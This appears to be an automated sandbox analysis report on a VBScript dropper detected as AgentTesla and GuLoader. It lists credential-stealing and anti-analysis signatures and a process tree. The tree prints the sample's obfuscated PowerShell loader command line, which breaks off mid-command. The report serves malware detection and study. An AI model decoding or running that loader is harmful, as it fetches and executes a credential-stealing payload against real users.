Edit tour
Windows
Analysis Report
PONO6188.vbs
Overview
General Information
Detection
AgentTesla, GuLoader
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected AgentTesla
Yara detected GuLoader
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses ping.exe to check the status of other devices and networks
Uses ping.exe to sleep
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 500 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\PONO6 188.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - PING.EXE (PID: 1364 cmdline:
ping googl e.com -n 1 MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 5828 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - PING.EXE (PID: 5500 cmdline:
ping %.%.% .% MD5: 2F46799D79D22AC72C241EC0322B011D) - conhost.exe (PID: 5328 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 4016 cmdline:
C:\Windows \system32\ cmd.exe /c dir MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 736 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 4620 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$Dragonwo rt = 1;$Va d='Substri n';$Vad+=' g';Functio n Forfatte rskaberne( $Honnren){ $Naeppe=$H onnren.Len gth-$Drago nwort;For( $Tyndhudet =5; $Tyndh udet -lt $ Naeppe; $T yndhudet+= (6)){$Anti cipants+=$ Honnren.$V ad.Invoke( $Tyndhudet , $Dragonw ort);}$Ant icipants;} function F lelsessage rs167($bai tfish){. ($Statsl s) ($baitf ish);}$Non critical84 =Forfatter skaberne ' Ni.roM D m moGaasezBr andi N.dkl FrokolMerc aaSiv.n/En sw.5Glaci. Berm0Nrin g Teate(Ar ntpWKnicki DkninnPles sdDeducoRe petwmahons C vil Kilo wNP omoT,a dly Sejse1 Forlg0Klon d.Menya0Pa ata;Cosse SorteW C.r ei,urkin s ade6P,tel4 Stoni;Bysb a Lettex C no6 Folk4 Adhak;Fis, i weedrAab env Voks:C apan1Res z 2Nonpo1 Wi rd.Dront0H asse) Inte VauntGSti kle.evercV emodkErhve oNeogr/Pra ef2Forep0A dem1Val,i 0 Held0Tak t.1Nontr0R ,gne1slbsa ParagFJen viiClearrR igore rull fCircuoLid oxSymme/ Band1Amfib 2sho p1Min ds.L.est0T ude. ';$Sy stemgrafs= Forfatters kaberne 'E rnriU D sc s KunseA t iqrPolit-t javsA Spnd gtaxieeS.b venArabet Dece ';$Be white=Forf atterskabe rne 'Endan hWadmat Il lat annap Gyre:Delig / Unfl/B m banElbiliR ateft in e iDtrenoArk ol. .nurco rd.noResta mShoeb/ K, erk Supe2K omma/Brego UHandenWat erc ForwoP oindnshraf sPancrc.if fsiBrydne Convn.utsu tPulloiJom froUningu LodgsToolm n.etaleSpi lfsVittus Gunv.Conc. jSamvrp.nd dkbEndoc ' ;$Foelsomh ed=Forfatt erskaberne 'Extra>Al koh ';$Sta tsls=Forfa tterskaber ne 'Re,nui KandeHust .x.indu '; $Soil='Bur eaucratize s';Flelses sagers167 (Forfatter skaberne ' SuperSThro ue Bl atEn eka-Unde.C SavtaoBibl .n UbiqtRe dekeEnkeln ucert Lim e Has,e-fo rbuPkludra Advotmini mhSpl.t Mu .tiTNvnin: Kan.n\ omm eAIdeoln P ewet.jllei AbdietNedk uyDorsipBe clio Pissu BrystsImmo b.MelletAl actxB nzet Overp Misf o- CincV l upuaUltral Tre.muNum. eeUnive Ig n,t$ uskuS melano gle ri UndelSu me.; Na,u ');Flelses sagers167 (Forfatter skaberne ' MetafiMask if Sheo Sm aa(GerbrtR aneeeAcqui sNitritD.m me-Divisps tewaaShoop tAmt fhBut tl BoxinTB ioxa: Gr n \futurAEth ionKorrotL dervi Leng tStor,y,ar vepSyneroS mrreuKiwif sWebbe.Pap agtendowxm isfot Citr )Hoved{ Re dseDextrxt rachiTroch tDrnle}.ct or;Benda ' );$Plumipe de107 = Fo rfatterska berne ' Om steSqsamcT one.hLodli oProli Hvn en%snksmaU nexapDumst pRigsmdCo ntaRenipt FrigaHanke % Smil\ B. rdVKa.meeS e sur Uhe. eBranddHip poiMbirac Bildt.eget .Unprem Re giocoleouT roll S gte &Afkry&Mag ia F.odeNa tioc N.nph PulpioPrec o ulli$ De od ';Flels essagers16 7 (Forfatt erskaberne 'Coe o$In chag Asafl TriumoTret tbUngraa u rfl Alun:T haniHTab r eskar,aros arrSpaentG eot.gKontr r Vrt i Dy rseStoddfF akul=Dagge ( Te,ecJas pimSkat,dB